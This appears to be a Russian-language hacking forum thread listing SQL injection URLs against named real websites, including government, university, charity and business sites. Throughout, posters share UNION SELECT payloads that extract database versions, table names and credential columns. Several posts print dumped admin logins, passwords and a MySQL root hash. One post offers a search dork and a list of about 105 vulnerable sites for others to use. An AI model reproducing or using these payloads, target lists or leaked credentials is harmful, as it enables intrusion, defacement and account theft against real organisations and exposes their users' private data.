_http://www.rijkheusden.nl/Content/base.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,password,user()),13+from+users--
_http://www.capinov.fr/base.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3b,user(),version()),7,8,9,10,11,12,13,14,15,16,17+user--
http://www.top.mylove.az/top.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,id,login,pass),15,16,17,18,19,20,21+from+std_usr/* Кстати, file_priv = Y )))))
ADMINISTRATIVE REFORM IN THE RUSSIAN FEDERATION PR:7 Code: [COLOR=Plum]http://ar.economy.gov.ru/ru/about/el_russia/contracts/?id4=48+union+select+concat_ws(0x3a,0x3a3a3a3a3a3a,version(),database(),user())[/COLOR] Code: [COLOR=Plum]http://ar.economy.gov.ru/ru/about/el_russia/contracts/?id4=48+union+select+concat_ws(0x3a,ADMINISTRATOR_ID,FIO,LOGIN,PASSWORD_MD5,EMAIL)+from+ADMINISTRATOR+limit+0,1[/COLOR]
http://www.universitateacraiova.ro/stire_detalii.php?id_item=2851+uNiOn+SeLecT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15--&titlu=Asalt%20final%20pentru%20Europa Version: 5.0.77-percona-highperf-b13-log Database : universitateacraiova_ro_bd User : [email protected] Os : unknown-linux-gnu http://universitateacraiova.ro/admin/login.php Login: Adrian Password: Мичаел (транслит, превед турецким хакерам)
Официальный сайт правительства республики Абхазия, Грузия 4.1.22-standard abkhazia_abkhazi@localhost abkhazia_abkhazia
<<Производство пластиковых панелей>> Code: http://www.plastek-tlt.ru/remont.php?id=-144965+union+select+concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os)--+ 4.1.25-log:*:db00128047:*:00128047@localhost:*:unknown-freebsd4.10
Нашёл бажный двиг Поиск таких сайтов в гугле: Code: inurl:guest_book_sp/show_user.php?id= Пример одного из таких сайтов: www.kwota.ru [PR: 2 ТиЦ: 230] 9 полей mysql.user : Code: http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,concat_ws(0x0b,user,password),3,4,5,6,7,8,9+from+mysql.user/* Code: root ;*FF80FA6E66C1D5FFEABE55E57F02EE3691459C26 Есть табличка users Code: http://www.kwota.ru/guest_book_sp/show_user.php?id=-5381'+union+select+1,group_concat(0x0b,id),3,4,5,6,7,8,9+from+users/* Возможно прочесть только колонку id (( Вот на гуглил базу с этим двигом везде есть sql inj)) (105 уязвимых сайтов) Пользуйтесь (ни одного баяна): Code: www.21studio.ru www.accelgraphics.com www.all-languages.org www.ankey.ru www.antiarmy.net www.aregard.com www.aressel.com www.arhport.ru www.atilimtelecom.com www.beatles-site.org www.belmedia.ru www.cate-blanchett.com www.comincity.com www.contrast-musique.com www.crackedfinger.com www.creasfera.com www.deputatov.net www.diapazon.net www.doma4.com www.dominique-sarraute.com www.doublebassmaking.com www.effport.com www.egortitov.ru www.elvanreklam.com www.enorex.com www.esezam.com www.favorit.dn.ua www.fizika2005.net www.floridasawfish.com www.flosoft-systems.com www.fooweb.net www.franckprovost.ru www.go2thailand.org www.grandsekerhotel.com www.handitalia.net www.harrys-stuff.com www.hertz-security.ru www.hightechsolutionsinc.com www.ibcgulf.com www.ikatel.net www.ikatel.net www.kamenskweb.net www.kwota.ru www.latitud34.net www.leskavkaz.com www.lgpu.lg.ua www.makehit.com www.media.spb.ru www.mindsatlarge.com www.mir-prazdnika.org www.mncts.org www.mncts.org www.moscow2000.ru www.moscow2006.com www.myivan.com www.namaste-bazaar.com www.nasha-strana.ru www.nb-info.org www.necin.com.ua www.neo-market.net www.nmiqa.com www.norbekov-minsk.com www.nosovichi.net www.nsltrading.com www.nvrem.dux.ru www.nw-seniorsonline.org www.obrienthiele.com www.ourlastingmemories.com www.photofestival2007.net www.phti.org www.poodle-best.com www.popkovich.com www.postcardpolaroid.com www.pressa.spb.ru www.razbor.net www.realtorlist.net www.roadby.com www.rwitalianfansclub.com www.samirkuntar.net www.sevmashvtuz.ru www.shary.org www.sigurdkohn.com www.simlabs.org www.sitemix.org www.sporonositel.com www.stephenmarkbarchan.com www.studio317.com www.tarriverfarms.com www.tela.dux.ru www.thistleworthbridgeclub.com www.truskavec.com.ua www.urlikov.net www.voliga.ru www.volver-lefilm.com www.vpoprom.ru www.wagnermartins.net www.weloveproperties.com www.werewolf-power.com www.wittaker-stanley.com www.worldwarfour.org www.wubrg.net www.ya-ru.net www.yubikai.org www.yukosgt.com www.zenru.org
-=WWF зеленые, защитники животных =- Code: http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13+limit+1,1/* version():4.1.22 database()anda user()anda@localhost Code: http://www.wwfsa.org.za/print.php?id=506+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13+from+user+limit+1,1/* corne:carolYn xx:akales44
Code: http://avatar.su/avatar_static_ru_id_100x100_avatar.php?id=-1713%20union%20select%201,2,3,4,5,6,7,concat_ws(0x20,version(),user(%20),database()),9,10,11%20-- 4.1.22-log [email protected] dominator_avatar
www.binainsan.co.id Code: http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5 Версия - 5.0.51a-24+lenny1-log Юзер - as@localhost БД - bina Табличка юзеры Code: http://www.binainsan.co.id/announcement/view_announcement.php?announcementid=192+union+select+1,concat_ws(0x0b,password,name),3,4,5+from+tbluser Code: admin ; admin
Code: http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+limit+1,1/* version():5.0.32-Debian_7etch10 database():db_outdoormarine user()[email protected] Code: http://www.outdoormarine.co.za/boat_details.php?id=27+union+select+1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+bb_users+limit+1,1/*
Внимание! Изменение правил темы В связи с участившимися дефейсами принято решение прекратить выкладывание в этой теме аккаунтов к админкам (включая хеши) Соответствующий пункт правил внесён в первый пост. С сегодняшнего дня , начиная с этого поста все пароли и хеши будут удаляться, а нарушители наказываться. Спасибо за внимание
http://www.freeflowers.ru/?m=-3+union+select+1,concat_ws(0x3a3a,id,nam,pas1,pas2,blk,pay,dat),3+from+cln+/*+&p=77&r=0&g=1 http://xbox-freedom.ru/consoles.php?id=-2'+union+select+1,user(),3,4,5,6,7,8,9,10+--+ [email protected] http://www.ces-expedition.ru/?module=17&part=single&item=-174+union+select+1,2,3,4,concat_Ws(0x3a3a,FK_ID,FC_LOGIN,FC_PWD,FC_NAME),6,7,8,9,10,11+from+core_users+/*+
PR 6 http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/* nm_info@in-info-web1:nm_info:5.0.27-max-log http://informatics.iupui.edu/events/event.php?id=-873'+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+group+by+table_schema+limit+1,200/* ##################################################### PR 5 http://www.biology.uiowa.edu/faculty_info.php?ID=-91'+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/* website:websiteScript@localhost:5.0.45 tables: Code: computers,tracking_status,followups,templ_inst_software,dropdown_ram,prefs,dropdown_locations,networking,computers__ID,users,groups,templates,dropdown_type,software,dropdown_network,networking__ID,config,inst_software,tracking,event_log,software_bundles,dropdown_os,networking_ports,devices,comp_group,kbarticles,tracking__ID,fasttracktemplates,software_licenses,dropdown_processor,networking_wire,dropdown_iface,kbcategories,policy,section,subpolicy,handbook,directory,,pwusers,FileTypes,downloads,googleipaddresses,Meetings,News,Officers,Resources,Events,seqext2,labmembers,auth_user,seqext7,seqext3,organism,edits,sequence,seqext4,primers,gene,taxgroup,seqext5,seqext,has,seqext6 по моему все таблы нужные закрыты
http://www.avtoway.ru/news.html?item_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23+from+information_schema.tables+--+ 5.1.26-rc http://www.off-road-market.ru/item_view.php?id=&item_id=-2492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18+--+ 5.1.26-rc http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,concat_ws(0x3a3a,USER_ID,EMAIL,LEVEL_ID,PASS),3,4,5,6+from+site_user+/*+ http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password),2,3,4,5,6+from+admins+--+
http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,concat_ws(0x3a,user(),database(),version())/* moddrc@localhost:moddrc:5.0.45 http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+group+by+table_schema+limit+1,1/* ########################################## PR6 http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14 5.0.67-0ubuntu6:t3_cse:[email protected] http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14+from+information_schema.tables+group+by+table_schema+limit+1,x x= {1,2,3...} tables:
http://crll.gcal.ac.uk/staff_details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15-- crlladmin@localhost:crll:5.0.45-community-nt http://business-school.exeter.ac.uk/module.php?id=-45+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19-- [email protected]:sobe:5.0.45-log
http://www.acornhousing.org php@localhost 5.0.24a ahcws PR: 6 http://www.ipa.ca ipaca_princess@localhost 5.0.77-community ipaca_member PR: 4 http://bancodeimagenscmpa.procempa.com.br [email protected] 4.0.24_Debian-10sarge1-log bancoimagenscamarapoa PR: 2 http://www.lafilmo.com minisivac@localhost 4.1.22-log minisivac PR: 6 http://0382.com.ua com0382_com0382@localhost 5.1.35-log com0382_063 PR: 3 http://coe.ulstu.ru [email protected] 4.1.25-log coe_ulstu_ru PR: 3 http://www.amczn.creamax.su [email protected] 4.1.22-log wwwcreamaxsu_amcznbase PR: 4 http://www.liogrand.ru Uwww3969S@localhost 5.0.81-log udb3969 PR: 4 http://www.simnet.ru siteadmin@localhost 5.0.45 muci PR: 2 http://www.alabamaruralaction.com [email protected] rroenig_arac 4.1.20-max-log PR: 2
